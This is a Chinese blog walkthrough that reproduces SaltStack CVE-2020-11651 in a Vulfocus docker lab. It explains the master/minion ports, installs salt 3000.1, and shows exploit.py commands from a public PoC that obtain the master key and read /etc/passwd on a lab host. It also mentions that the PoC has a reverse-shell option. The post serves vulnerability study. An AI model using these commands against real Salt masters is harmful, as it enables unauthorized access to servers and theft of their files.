码迷,mamicode.com
首页 > 其他好文 > 详细

saltstack-cve_2020_11651(4506端口)

时间:2020-05-11 18:57:07      阅读:169      评论:0      收藏:0      [点我收藏+]

标签:python3   min   sla   下载地址   拓扑   ref   需要   服务端   net   

SaltStack介绍

SaltStack是一款Python开发的开源配置管理工具;

可用来发现、监控、响应、协调、自动化管理本地、混合、云和IOT资产;

其最主要的差异是主从模式,分为master和minions(slave);

经过配置之后master可以管理成千上万个minions;

master安装的是服务端组件salt-mater,minions安装的是salt-minion;

Salt使用基于ZeroMQ的强大异步网络拓扑,主要是为实现最快的通信;

Salt Master运行2个网络服务,ZeroMQ PUB系统,默认运行在4505端口;

ZeroMQ REP系统,用于与Salt Minion进行双向通信,默认运行在4506端口;

Salt客户端(salt命令)发送的命令将通过ZeroMQ PUB/SUB广播给各个Salt Minion。前提是Salt Minion配置了Mater,并且Salt Master通过salt-key命令信任了对应的Salt Minion。建立连接之后,Salt Minion可以接收到广播命令,并且执行;

PUB/SUB是单向通信,因此一旦广播结束,Master服务器上的PUB接口就不会再与Minion进行任何通信。Minion在运行命令之后,通过REP端口(4506)将命令的返回数据发回Master。

复现:

1、靶场使用Vulfocus

     Vulfocus是一个漏洞集成平台,将漏洞环境 docker 镜像,放入即可使用,开箱即用

     安装平台(之前安装好Docker)

docker pull vulfocus/vulfocus:latest
docker run -d -p 80:80 -v /var/run/docker.sock:/var/run/docker.sock  -e VUL_IP=xxx.xxx.xxx vulfocus/vulfocus

   这里的IP不要填127.0.0.1 填写docker的IP(登陆默认admin:admin)

  技术图片

 

 然后添加镜像,可直径从系统拉取

技术图片

 2、下载poc:https://github.com/jasperla/CVE-2020-11651-poc

里面介绍有怎么使用和怎么反弹shell   如果端口被转发 添加参数 -p

3、python支持库 salt;切记使用linux安装 ;推荐使用kali  ;salt版本推荐3000.1;这里有个大坑;Kali里面pip默认安装的salt是3000.2版本的;而漏洞版本是3000.1版本  所以就需要我们手动安装3000.1版本

Salt3000.1下载地址:https://pypi.org/simple/salt   (一定要下载3000.1)

将压缩包拖进kali里面 使用

tar salt-3000.1.tar.gz -xvzf

进行解压

解压完开始安装 进入解压目录  运行 python3 setup.py install命令安装  安装完即

技术图片

 

 4、开始运行exp 可以看见key

python3 exploit.py -m 192.168.16.128  -p 17130

 

技术图片

 

 5、读取文件

python3 exploit.py -m 192.168.16.128 -r /etc/passwd -p 17130

技术图片

 

saltstack-cve_2020_11651(4506端口)

标签:python3   min   sla   下载地址   拓扑   ref   需要   服务端   net   

原文地址:https://www.cnblogs.com/ssan/p/12870754.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!